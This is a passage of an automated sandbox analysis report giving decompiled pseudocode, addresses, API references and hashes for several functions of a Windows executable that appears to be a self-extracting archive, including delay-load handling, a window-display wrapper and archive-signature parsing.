Instruction Fuzzy Hash: C4D0A934204302282C9837B0688AAEC23847BB2FB07F00A9AEBA08A0D3EE1081006711

Uniqueness

Uniqueness Score: -1.00%

Function 0007DC67 Relevance: 3.0, APIs: 2, Instructions: 13
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 30%

			E0007DC67(void* __ecx, void* __esi) {
				signed int _v8;
				void* _t5;
				intOrPtr _t8;
				signed int _t9;
				void* _t16;
				void* _t20;
				signed int _t26;

				_t20 = __esi;
				_t16 = __ecx;
				if(( *0x95560 & 0x00001000) == 0) {
					return _t5;
				} else {
					E0007DD15(__ecx, __esi);
					_t8 =  *0xc0ce0 + 1;
					 *0xc0ce0 = _t8;
					if(_t8 == 1) {
						E0007DE67(4, 0xc0ce4); // executed
					}
					_t24 = _t26;
					_push(_t16);
					_t9 =  *0x9e668; // 0x136d1c5
					_v8 = _t9 ^ _t26;
					if(E0007DC9A() == 0) {
						 *0xc0cdc = 0;
					} else {
						 *0x93260(0xc0cdc, _t20);
						 *((intOrPtr*)( *0xc0cd8))();
					}
					return E0007EC4A(_v8 ^ _t24);
				}
			}

0x0007dc67
0x0007dc67
0x0007dc71
0x0007dc99
0x0007dc73
0x0007dc73
0x0007dc7d
0x0007dc7e
0x0007dc86
0x0007dc8f
0x0007dc8f
0x0007df12
0x0007df14
0x0007df15
0x0007df1c
0x0007df26
0x0007df41
0x0007df28
0x0007df36
0x0007df3c
0x0007df3e
0x0007df58
0x0007df58

APIs

DloadLock.DELAYIMP ref: 0007DC73
DloadProtectSection.DELAYIMP ref: 0007DC8F

Part of subcall function 0007DE67: DloadObtainSection.DELAYIMP ref: 0007DE77

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: Dload$Section$LockObtainProtect
String ID:
API String ID: 731663317-0
Opcode ID: ea30557857a54d094ed89a15e1ac91f2ff01f549fa8e1267ef140818bfa5efa6
Instruction ID: 3ea854c6434df37e4bc5b6f40285fcb3ba6727a47d556b53597871accab2d484
Opcode Fuzzy Hash: ea30557857a54d094ed89a15e1ac91f2ff01f549fa8e1267ef140818bfa5efa6
Instruction Fuzzy Hash: 93D0C9709002018AE362AB14D9D6B5C32B4BF14744FA48657E15D8A0A6DBAD5880C60D

Uniqueness

Uniqueness Score: -1.00%

Function 000612E6 Relevance: 3.0, APIs: 2, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E000612E6(struct HWND__* _a4, int _a8, signed char _a12) {
				int _t8;

				asm("sbb eax, eax");
				_t8 = ShowWindow(GetDlgItem(_a4, _a8),  ~(_a12 & 0x000000ff) & 0x00000009); // executed
				return _t8;
			}

0x000612ed
0x00061302
0x00061308

APIs

GetDlgItem.USER32(?,?), ref: 000612FB
ShowWindow.USER32(00000000), ref: 00061302

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: ItemShowWindow
String ID:
API String ID: 3351165006-0
Opcode ID: 7c37569bd5473deb0399259998808eb6a827aaae91790e8e66e7d2d73c1eb5f2
Instruction ID: 9c4ebdc54c5dea514759c6dea166015037b1ed390c15be3512ff31c04f1e2b60
Opcode Fuzzy Hash: 7c37569bd5473deb0399259998808eb6a827aaae91790e8e66e7d2d73c1eb5f2
Instruction Fuzzy Hash: 50C01272058200BEDB010BB0DC09D2FBBA8EBA4212F09C908B6A5C0060C63CC010DB11

Uniqueness

Uniqueness Score: -1.00%

Function 000619A6 Relevance: 1.8, APIs: 1, Instructions: 310
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E000619A6(intOrPtr* __ecx, void* __edx) {
				void* __esi;
				signed int _t103;
				intOrPtr _t107;
				signed int _t109;
				signed int _t111;
				signed int _t115;
				signed int _t116;
				signed int _t127;
				intOrPtr _t128;
				char _t129;
				char _t140;
				intOrPtr _t146;
				signed int _t147;
				signed int _t148;
				void* _t151;
				signed int _t156;
				signed int _t160;
				void* _t165;
				void* _t167;
				void* _t171;
				intOrPtr* _t172;
				intOrPtr* _t174;
				signed int _t184;
				void* _t185;
				signed int _t187;
				char* _t202;
				intOrPtr _t203;
				signed int _t204;
				void* _t213;
				void* _t214;
				void* _t215;
				void* _t217;
				char* _t218;
				intOrPtr _t219;
				void* _t220;
				void* _t227;
				void* _t229;

				_t213 = __edx;
				_t174 = __ecx;
				E0007E28C(E00091CB9, _t229);
				_t172 = _t174;
				_t215 = _t172 + 0x21f8;
				 *((char*)(_t172 + 0x6cbc)) = 0;
				 *((char*)(_t172 + 0x6cc4)) = 0;
				 *0x93260(_t215, 7, _t214, _t220, _t171);
				if( *( *( *_t172 + 0xc))() == 7) {
					_t222 = 0;
					 *(_t172 + 0x6cc0) = 0;
					_t103 = E00061DA8(_t215, 7);
					__eflags = _t103;
					if(_t103 == 0) {
						E0006709D(_t229 - 0x38, 0x200000);
						 *(_t229 - 4) = 0;
						 *0x93260();
						_t107 =  *((intOrPtr*)( *((intOrPtr*)( *_t172 + 0x14))))();
						 *((intOrPtr*)(_t229 - 0x18)) = _t107;
						 *0x93260( *((intOrPtr*)(_t229 - 0x38)),  *((intOrPtr*)(_t229 - 0x34)) + 0xfffffff0);
						_t109 =  *( *_t172 + 0xc)();
						_t184 = _t109;
						_t222 = 0;
						 *(_t229 - 0x14) = _t184;
						__eflags = _t184;
						if(_t184 <= 0) {
							L22:
							__eflags =  *(_t172 + 0x6cc0);
							_t185 = _t229 - 0x38;
							if( *(_t172 + 0x6cc0) != 0) {
								_t35 = _t229 - 4; // executed
								 *_t35 =  *(_t229 - 4) | 0xffffffff;
								__eflags =  *_t35;
								E000615A0(_t185); // executed
								L25:
								_t111 =  *(_t172 + 0x6cb0);
								__eflags = _t111 - 4;
								if(__eflags != 0) {
									__eflags = _t111 - 3;
									if(_t111 != 3) {
										 *((intOrPtr*)(_t172 + 0x2200)) = 7;
										L32:
										 *((char*)(_t229 - 0xd)) = 0;
										__eflags = E00063AAC(_t172, _t213, _t222);
										 *(_t229 - 0xe) = 0;
										__eflags = 0 - 1;
										if(0 != 1) {
											L38:
											_t115 =  *((intOrPtr*)(_t229 - 0xd));
											L39:
											_t187 =  *((intOrPtr*)(_t172 + 0x6cc5));
											__eflags = _t187;
											if(_t187 == 0) {
												L41:
												__eflags =  *((char*)(_t172 + 0x6cc4));
												if( *((char*)(_t172 + 0x6cc4)) != 0) {
													L43:
													__eflags = _t187;
													if(__eflags == 0) {
														E00066DC1(__eflags, 0x1b, _t172 + 0x24);
													}
													__eflags =  *((char*)(_t229 + 8));
													if( *((char*)(_t229 + 8)) == 0) {
														goto L1;
													} else {
														L46:
														__eflags =  *(_t229 - 0xe);
														 *((char*)(_t172 + 0x6cb6)) =  *((intOrPtr*)(_t172 + 0x2224));
														if( *(_t229 - 0xe) == 0) {
															L68:
															__eflags =  *((char*)(_t172 + 0x6cb5));
															if( *((char*)(_t172 + 0x6cb5)) == 0) {
																L70:
																E0006FE56(_t172 + 0x6cfa, _t172 + 0x24, 0x800);
																L71:
																_t116 = 1;
																L72:
																 *[fs:0x0] =  *((intOrPtr*)(_t229 - 0xc));
																return _t116;
															}
															__eflags =  *((char*)(_t172 + 0x6cb9));
															if( *((char*)(_t172 + 0x6cb9)) == 0) {
																goto L71;
															}
															goto L70;
														}
														__eflags =  *((char*)(_t172 + 0x21e0));
														if( *((char*)(_t172 + 0x21e0)) == 0) {
															L49:
															 *0x93260();
															_t227 =  *((intOrPtr*)( *((intOrPtr*)( *_t172 + 0x14))))();
															_t217 = _t213;
															 *((intOrPtr*)(_t229 - 0x18)) =  *((intOrPtr*)(_t172 + 0x6ca0));
															 *(_t229 - 0x14) =  *(_t172 + 0x6ca4);
															 *((intOrPtr*)(_t229 - 0x1c)) =  *((intOrPtr*)(_t172 + 0x6ca8));
															 *((intOrPtr*)(_t229 - 0x20)) =  *((intOrPtr*)(_t172 + 0x6cac));
															 *((intOrPtr*)(_t229 - 0x24)) =  *((intOrPtr*)(_t172 + 0x21dc));
															while(1) {
																_t127 = E00063AAC(_t172, _t213, _t227);
																__eflags = _t127;
																if(_t127 == 0) {
																	break;
																}
																_t128 =  *((intOrPtr*)(_t172 + 0x21dc));
																__eflags = _t128 - 3;
																if(_t128 != 3) {
																	__eflags = _t128 - 2;
																	if(_t128 == 2) {
																		__eflags =  *((char*)(_t172 + 0x6cb5));
																		if( *((char*)(_t172 + 0x6cb5)) == 0) {
																			L65:
																			_t129 = 0;
																			__eflags = 0;
																			L66:
																			 *((char*)(_t172 + 0x6cb9)) = _t129;
																			L67:
																			 *((intOrPtr*)(_t172 + 0x6ca0)) =  *((intOrPtr*)(_t229 - 0x18));
																			 *(_t172 + 0x6ca4) =  *(_t229 - 0x14);
																			 *((intOrPtr*)(_t172 + 0x6ca8)) =  *((intOrPtr*)(_t229 - 0x1c));
																			 *((intOrPtr*)(_t172 + 0x6cac)) =  *((intOrPtr*)(_t229 - 0x20));
																			 *((intOrPtr*)(_t172 + 0x21dc)) =  *((intOrPtr*)(_t229 - 0x24));
																			 *0x93260(_t227, _t217, 0);
																			 *( *( *_t172 + 0x10))();
																			goto L68;
																		}
																		__eflags =  *((char*)(_t172 + 0x3318));
																		if( *((char*)(_t172 + 0x3318)) != 0) {
																			goto L65;
																		}
																		_t129 = 1;
																		goto L66;
																	}
																	__eflags = _t128 - 5;
																	if(_t128 == 5) {
																		goto L67;
																	}
																	L59:
																	E00061EDA(_t172);
																	continue;
																}
																__eflags =  *((char*)(_t172 + 0x6cb5));
																if( *((char*)(_t172 + 0x6cb5)) == 0) {
																	L55:
																	_t140 = 0;
																	__eflags = 0;
																	L56:
																	 *((char*)(_t172 + 0x6cb9)) = _t140;
																	goto L59;
																}
																__eflags =  *((char*)(_t172 + 0x5668));
																if( *((char*)(_t172 + 0x5668)) != 0) {
																	goto L55;
																}
																_t140 = 1;
																goto L56;
															}
															goto L67;
														}
														__eflags =  *((char*)(_t172 + 0x6cbc));
														if( *((char*)(_t172 + 0x6cbc)) != 0) {
															goto L68;
														}
														goto L49;
													}
												}
												__eflags = _t115;
												if(_t115 != 0) {
													goto L46;
												}
												goto L43;
											}
											__eflags =  *((char*)(_t229 + 8));
											if( *((char*)(_t229 + 8)) == 0) {
												goto L1;
											}
											goto L41;
										}
										__eflags = 0;
										 *((char*)(_t229 - 0xd)) = 0;
										while(1) {
											E00061EDA(_t172);
											_t146 =  *((intOrPtr*)(_t172 + 0x21dc));
											__eflags = _t146 - 1;
											if(_t146 == 1) {
												break;
											}
											__eflags =  *((char*)(_t172 + 0x21e0));
											if( *((char*)(_t172 + 0x21e0)) == 0) {
												L37:
												_t147 = E00063AAC(_t172, _t213, _t222);
												__eflags = _t147;
												_t148 = _t147 & 0xffffff00 | _t147 != 0x00000000;
												 *(_t229 - 0xe) = _t148;
												__eflags = _t148 - 1;
												if(_t148 == 1) {
													continue;
												}
												goto L38;
											}
											__eflags = _t146 - 4;
											if(_t146 == 4) {
												break;
											}
											goto L37;
										}
										_t115 = 1;
										goto L39;
									}
									_t218 = _t172 + 0x21ff;
									_t222 =  *( *_t172 + 0xc);
									 *0x93260(_t218, 1);
									_t151 =  *( *( *_t172 + 0xc))();
									__eflags = _t151 - 1;
									if(_t151 != 1) {
										goto L1;
									}
									__eflags =  *_t218;
									if( *_t218 != 0) {
										goto L1;
									}
									 *((intOrPtr*)(_t172 + 0x2200)) = 8;
									goto L32;
								}
								E00066DC1(__eflags, 0x3c, _t172 + 0x24);
								goto L1;
							}
							E000615A0(_t185);
							goto L1;
						} else {
							goto L6;
						}
						do {
							L6:
							_t202 =  *((intOrPtr*)(_t229 - 0x38)) + _t222;
							__eflags =  *_t202 - 0x52;
							if( *_t202 != 0x52) {
								goto L17;
							}
							_t156 = E00061DA8(_t202, _t109 - _t222);
							__eflags = _t156;
							if(_t156 == 0) {
								L16:
								_t109 =  *(_t229 - 0x14);
								goto L17;
							}
							_t203 =  *((intOrPtr*)(_t229 - 0x18));
							 *(_t172 + 0x6cb0) = _t156;
							__eflags = _t156 - 1;
							if(_t156 != 1) {
								L19:
								_t204 = _t203 + _t222;
								 *(_t172 + 0x6cc0) = _t204;
								_t222 =  *( *_t172 + 0x10);
								 *0x93260(_t204, 0, 0);
								 *( *( *_t172 + 0x10))();
								_t160 =  *(_t172 + 0x6cb0);
								__eflags = _t160 - 2;
								if(_t160 == 2) {
									L21:
									_t222 =  *( *_t172 + 0xc);
									 *0x93260(_t215, 7);
									 *( *( *_t172 + 0xc))();
									goto L22;
								}
								__eflags = _t160 - 3;
								if(_t160 != 3) {
									goto L22;
								}
								goto L21;
							}
							__eflags = _t222;
							if(_t222 <= 0) {
								goto L19;
							}
							__eflags = _t203 - 0x1c;
							if(_t203 >= 0x1c) {
								goto L19;
							}
							__eflags =  *(_t229 - 0x14) - 0x1f;
							if( *(_t229 - 0x14) <= 0x1f) {
								goto L19;
							}
							_t165 =  *((intOrPtr*)(_t229 - 0x38)) - _t203;
							__eflags =  *((char*)(_t165 + 0x1c)) - 0x52;
							if( *((char*)(_t165 + 0x1c)) != 0x52) {
								goto L16;
							}
							__eflags =  *((char*)(_t165 + 0x1d)) - 0x53;
							if( *((char*)(_t165 + 0x1d)) != 0x53) {
								goto L16;
							}
							__eflags =  *((char*)(_t165 + 0x1e)) - 0x46;
							if( *((char*)(_t165 + 0x1e)) != 0x46) {
								goto L16;
							}
							__eflags =  *((char*)(_t165 + 0x1f)) - 0x58;
							if( *((char*)(_t165 + 0x1f)) == 0x58) {
								goto L19;
							}
							goto L16;
							L17:
							_t222 = _t222 + 1;
							__eflags = _t222 - _t109;
						} while (_t222 < _t109);
						goto L22;
					}
					 *(_t172 + 0x6cb0) = _t103;
					__eflags = _t103 - 1;
					if(_t103 == 1) {
						_t219 =  *_t172;
						_t222 =  *(_t219 + 0x14);
						 *0x93260(0);
						_t167 =  *( *(_t219 + 0x14))();
						asm("sbb edx, 0x0");
						 *0x93260(_t167 - 7, _t213);
						 *((intOrPtr*)(_t219 + 0x10))();
					}
					goto L25;
				}
				L1:
				_t116 = 0;
				goto L72;
			}

0x000619a6
0x000619a6
0x000619ab
0x000619b4
0x000619bc
0x000619c3
0x000619ca
0x000619d6
0x000619e3
0x000619ee
0x000619f1
0x000619f7
0x000619fc
0x000619fe
0x00061a44
0x00061a4b
0x00061a53
0x00061a5b
0x00061a69
0x00061a6f
0x00061a77
0x00061a7a
0x00061a7c
0x00061a7e
0x00061a81
0x00061a83
0x00061b26
0x00061b26
0x00061b2d
0x00061b30
0x00061b3c
0x00061b3c
0x00061b3c
0x00061b40
0x00061b45
0x00061b45
0x00061b4b
0x00061b4e
0x00061b60
0x00061b63
0x00061b9d
0x00061ba7
0x00061bab
0x00061bb3
0x00061bb8
0x00061bbb
0x00061bbd
0x00061bff
0x00061bff
0x00061c02
0x00061c02
0x00061c08
0x00061c0a
0x00061c16
0x00061c16
0x00061c1d
0x00061c23
0x00061c23
0x00061c25
0x00061c2d
0x00061c2d
0x00061c32
0x00061c36
0x00000000
0x00061c3c
0x00061c3c
0x00061c3c
0x00061c46
0x00061c4c
0x00061d5e
0x00061d5e
0x00061d65
0x00061d70
0x00061d80
0x00061d85
0x00061d85
0x00061d87
0x00061d8d
0x00061d97
0x00061d97
0x00061d67
0x00061d6e
0x00000000
0x00000000
0x00000000
0x00061d6e
0x00061c52
0x00061c59
0x00061c68
0x00061c6f
0x00061c79
0x00061c7b
0x00061c83
0x00061c8c
0x00061c95
0x00061c9e
0x00061ca7
0x00061cf0
0x00061cf2
0x00061cf7
0x00061cf9
0x00000000
0x00000000
0x00061cb3
0x00061cb9
0x00061cbc
0x00061cdf
0x00061ce2
0x00061cfd
0x00061d04
0x00061d14
0x00061d14
0x00061d14
0x00061d16
0x00061d16
0x00061d1c
0x00061d1f
0x00061d28
0x00061d31
0x00061d3a
0x00061d43
0x00061d54
0x00061d5c
0x00000000
0x00061d5c
0x00061d06
0x00061d0d
0x00000000
0x00000000
0x00061d11
0x00000000
0x00061d11
0x00061ce4
0x00061ce7
0x00000000
0x00000000
0x00061ce9
0x00061ceb
0x00000000
0x00061ceb
0x00061cbe
0x00061cc5
0x00061cd5
0x00061cd5
0x00061cd5
0x00061cd7
0x00061cd7
0x00000000
0x00061cd7
0x00061cc7
0x00061cce
0x00000000
0x00000000
0x00061cd2
0x00000000
0x00061cd2
0x00000000
0x00061cfb
0x00061c5b
0x00061c62
0x00000000
0x00000000
0x00000000
0x00061c62
0x00061c36
0x00061c1f
0x00061c21
0x00000000
0x00000000
0x00000000
0x00061c21
0x00061c0c
0x00061c10
0x00000000
0x00000000
0x00000000
0x00061c10
0x00061bbf
0x00061bc1
0x00061bc4
0x00061bc6
0x00061bcb
0x00061bd1
0x00061bd4
0x00000000
0x00000000
0x00061bda
0x00061be1
0x00061bec
0x00061bee
0x00061bf3
0x00061bf5
0x00061bf8
0x00061bfb
0x00061bfd
0x00000000
0x00000000
0x00000000
0x00061bfd
0x00061be3
0x00061be6
0x00000000
0x00000000
0x00000000
0x00061be6
0x00061cac
0x00000000
0x00061cac
0x00061b67
0x00061b70
0x00061b75
0x00061b7d
0x00061b7f
0x00061b82
0x00000000
0x00000000
0x00061b88
0x00061b8b
0x00000000
0x00000000
0x00061b91
0x00000000
0x00061b91
0x00061b56
0x00000000
0x00061b56
0x00061b32
0x00000000
0x00000000
0x00000000
0x00000000
0x00061a89
0x00061a89
0x00061a8c
0x00061a8e
0x00061a91
0x00000000
0x00000000
0x00061a97
0x00061a9c
0x00061a9e
0x00061ada
0x00061ada
0x00000000
0x00061ada
0x00061aa0
0x00061aa3
0x00061aa9
0x00061aac
0x00061ae4
0x00061ae6
0x00061aec
0x00061af2
0x00061af8
0x00061b00
0x00061b02
0x00061b08
0x00061b0b
0x00061b12
0x00061b17
0x00061b1c
0x00061b24
0x00000000
0x00061b24
0x00061b0d
0x00061b10
0x00000000
0x00000000
0x00000000
0x00061b10
0x00061aae
0x00061ab0
0x00000000
0x00000000
0x00061ab2
0x00061ab5
0x00000000
0x00000000
0x00061ab7
0x00061abb
0x00000000
0x00000000
0x00061ac0
0x00061ac2
0x00061ac6
0x00000000
0x00000000
0x00061ac8
0x00061acc
0x00000000
0x00000000
0x00061ace
0x00061ad2
0x00000000
0x00000000
0x00061ad4
0x00061ad8
0x00000000
0x00000000
0x00000000
0x00061add
0x00061add
0x00061ade
0x00061ade
0x00000000
0x00061ae2
0x00061a00
0x00061a06
0x00061a09
0x00061a0f
0x00061a12
0x00061a17
0x00061a1f
0x00061a27
0x00061a2c
0x00061a34
0x00061a34
0x00000000
0x00061a09
0x000619e5
0x000619e5
0x00000000

APIs

__EH_prolog.LIBCMT ref: 000619AB

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: b1a401bc9bbf30cc6aa5a4398dc92f525c63f1d7d6e027903ec8741bf74ba597
Instruction ID: 6a570d3882d76aa9a8d18b6858072a6d8249f1ec2860ef71ace71740492d9fc5
Opcode Fuzzy Hash: b1a401bc9bbf30cc6aa5a4398dc92f525c63f1d7d6e027903ec8741bf74ba597
Instruction Fuzzy Hash: F8C19F30A042549FEF55CF68C895BED7BE6AF0A314F0C40BAEC46DB286CB359944CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00063B3D Relevance: 1.7, APIs: 1, Instructions: 176
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00063B3D(void* __ecx, signed int __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				char _t76;
				signed int _t83;
				intOrPtr _t94;
				void* _t120;
				char _t121;
				void* _t123;
				void* _t130;
				signed int _t144;
				signed int _t148;
				void* _t151;
				void* _t153;

				_t143 = __edx;
				_t123 = __ecx;
				E0007E28C(E00091D16, _t153);
				E0007E360();
				_t151 = _t123;
				_t156 =  *((char*)(_t151 + 0x6cc4));
				if( *((char*)(_t151 + 0x6cc4)) == 0) {
					__eflags =  *((char*)(_t151 + 0x45f0)) - 5;
					if(__eflags > 0) {
						L26:
						E00066DC1(__eflags, 0x1e, _t151 + 0x24);
						goto L27;
					}
					__eflags =  *((intOrPtr*)(_t151 + 0x6cb0)) - 3;
					__eflags =  *((intOrPtr*)(_t151 + 0x45ec)) - ((0 |  *((intOrPtr*)(_t151 + 0x6cb0)) != 0x00000003) - 0x00000001 & 0x00000015) + 0x1d;
					if(__eflags > 0) {
						goto L26;
					}
					_t83 =  *(_t151 + 0x5628) |  *(_t151 + 0x562c);
					__eflags = _t83;
					if(_t83 != 0) {
						L7:
						_t120 = _t151 + 0x20e8;
						E0006C926(_t83, _t120);
						_push(_t120);
						E0007187A(_t153 - 0xe6ec, __eflags); // executed
						_t121 = 0;
						 *((intOrPtr*)(_t153 - 4)) = 0;
						E00072C42(0, _t153 - 0xe6ec, _t153,  *((intOrPtr*)(_t151 + 0x56c4)), 0);
						_t148 =  *(_t153 + 8);
						__eflags =  *(_t153 + 0xc);
						if( *(_t153 + 0xc) != 0) {
							L15:
							__eflags =  *((intOrPtr*)(_t151 + 0x566b)) - _t121;
							if( *((intOrPtr*)(_t151 + 0x566b)) == _t121) {
								L18:
								E0006AA88(_t151 + 0x21a0, _t143,  *((intOrPtr*)(_t151 + 0x5640)), 1);
								 *(_t151 + 0x2108) =  *(_t151 + 0x5628);
								 *(_t151 + 0x210c) =  *(_t151 + 0x562c);
								 *((char*)(_t151 + 0x2110)) = _t121;
								E0006C9D9(_t151 + 0x20e8, _t151,  *(_t153 + 0xc));
								_t130 = _t151 + 0x20e8;
								 *((char*)(_t151 + 0x2111)) =  *((intOrPtr*)(_t153 + 0x10));
								 *((char*)(_t151 + 0x2137)) =  *((intOrPtr*)(_t151 + 0x5669));
								 *((intOrPtr*)(_t130 + 0x38)) = _t151 + 0x45d0;
								 *((intOrPtr*)(_t130 + 0x3c)) = _t121;
								_t94 =  *((intOrPtr*)(_t151 + 0x5630));
								_t144 =  *(_t151 + 0x5634);
								 *((intOrPtr*)(_t153 - 0x9aa4)) = _t94;
								 *(_t153 - 0x9aa0) = _t144;
								 *((char*)(_t153 - 0x9a8c)) = _t121;
								__eflags =  *((intOrPtr*)(_t151 + 0x45f0)) - _t121;
								if(__eflags != 0) {
									E000728F1(_t153 - 0xe6ec,  *((intOrPtr*)(_t151 + 0x45ec)), _t121);
								} else {
									_push(_t144);
									_push(_t94);
									_push(_t130); // executed
									E000692E6(_t121, _t144, _t148, __eflags); // executed
								}
								asm("sbb edx, edx");
								_t143 =  ~( *(_t151 + 0x569a) & 0x000000ff) & _t151 + 0x0000569b;
								__eflags = E0006AA56(_t151 + 0x21a0, _t148, _t151 + 0x5640,  ~( *(_t151 + 0x569a) & 0x000000ff) & _t151 + 0x0000569b);
								if(__eflags != 0) {
									_t121 = 1;
								} else {
									E00061F94(__eflags, 0x1f, _t151 + 0x24, _t151 + 0x45f8);
									E00066FC6(0xa0f50, 3);
									__eflags = _t148;
									if(_t148 != 0) {
										E00063E53(_t148);
									}
								}
								L25:
								E00071ACF(_t153 - 0xe6ec, _t143, _t148, _t151);
								_t76 = _t121;
								goto L28;
							}
							_t143 =  *(_t151 + 0x21bc);
							__eflags =  *((intOrPtr*)(_t143 + 0x5124)) - _t121;
							if( *((intOrPtr*)(_t143 + 0x5124)) == _t121) {
								goto L25;
							}
							asm("sbb ecx, ecx");
							_t138 =  ~( *(_t151 + 0x5670) & 0x000000ff) & _t151 + 0x00005671;
							__eflags =  ~( *(_t151 + 0x5670) & 0x000000ff) & _t151 + 0x00005671;
							E0006C991(_t151 + 0x20e8, _t121,  *((intOrPtr*)(_t151 + 0x566c)), _t143 + 0x5024, _t138, _t151 + 0x5681,  *((intOrPtr*)(_t151 + 0x56bc)), _t151 + 0x569b, _t151 + 0x5692);
							goto L18;
						}
						__eflags =  *(_t151 + 0x5634);
						if(__eflags < 0) {
							L12:
							__eflags = _t148;
							if(_t148 != 0) {
								E00062034(_t148,  *((intOrPtr*)(_t151 + 0x5630)));
								E0006C9F6(_t151 + 0x20e8,  *_t148,  *((intOrPtr*)(_t151 + 0x5630)));
							} else {
								 *((char*)(_t151 + 0x2111)) = 1;
							}
							goto L15;
						}
						if(__eflags > 0) {
							L11:
							E00066DC1(__eflags, 0x1e, _t151 + 0x24);
							goto L25;
						}
						__eflags =  *((intOrPtr*)(_t151 + 0x5630)) - 0x1000000;
						if(__eflags <= 0) {
							goto L12;
						}
						goto L11;
					}
					__eflags =  *((intOrPtr*)(_t151 + 0x5669)) - _t83;
					if( *((intOrPtr*)(_t151 + 0x5669)) != _t83) {
						goto L7;
					} else {
						_t76 = 1;
						goto L28;
					}
				} else {
					E00066DC1(_t156, 0x1d, _t151 + 0x24);
					E00066FC6(0xa0f50, 3);
					L27:
					_t76 = 0;
					L28:
					 *[fs:0x0] =  *((intOrPtr*)(_t153 - 0xc));
					return _t76;
				}
			}

0x00063b3d
0x00063b3d
0x00063b42
0x00063b4c
0x00063b52
0x00063b54
0x00063b5b
0x00063b79
0x00063b80
0x00063dc2
0x00063dc8
0x00000000
0x00063dc8
0x00063b88
0x00063b99
0x00063b9f
0x00000000
0x00000000
0x00063bab
0x00063bab
0x00063bb1
0x00063bc2
0x00063bc3
0x00063bcc
0x00063bd1
0x00063bd8
0x00063bdd
0x00063bec
0x00063bef
0x00063bf4
0x00063bf7
0x00063bfa
0x00063c4f
0x00063c4f
0x00063c55
0x00063cb1
0x00063cbf
0x00063cd3
0x00063ce0
0x00063ce6
0x00063cec
0x00063cf4
0x00063cfa
0x00063d06
0x00063d12
0x00063d15
0x00063d18
0x00063d1e
0x00063d24
0x00063d2a
0x00063d30
0x00063d36
0x00063d3c
0x00063d55
0x00063d3e
0x00063d3e
0x00063d3f
0x00063d40
0x00063d41
0x00063d41
0x00063d6f
0x00063d71
0x00063d80
0x00063d82
0x00063daf
0x00063d84
0x00063d91
0x00063d9d
0x00063da2
0x00063da4
0x00063da8
0x00063da8
0x00063da4
0x00063db1
0x00063db7
0x00063dbd
0x00000000
0x00063dbf
0x00063c57
0x00063c5d
0x00063c63
0x00000000
0x00000000
0x00063c8c
0x00063c95
0x00063c95
0x00063cac
0x00000000
0x00063cac
0x00063bfc
0x00063c02
0x00063c22
0x00063c22
0x00063c24
0x00063c37
0x00063c4a
0x00063c26
0x00063c26
0x00063c26
0x00000000
0x00063c24
0x00063c04
0x00063c12
0x00063c18
0x00000000
0x00063c18
0x00063c06
0x00063c10
0x00000000
0x00000000
0x00000000
0x00063c10
0x00063bb3
0x00063bb9
0x00000000
0x00063bbb
0x00063bbb
0x00000000
0x00063bbb
0x00063b5d
0x00063b63
0x00063b6f
0x00063dcd
0x00063dcd
0x00063dcf
0x00063dd3
0x00063ddd
0x00063ddd

APIs

__EH_prolog.LIBCMT ref: 00063B42

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
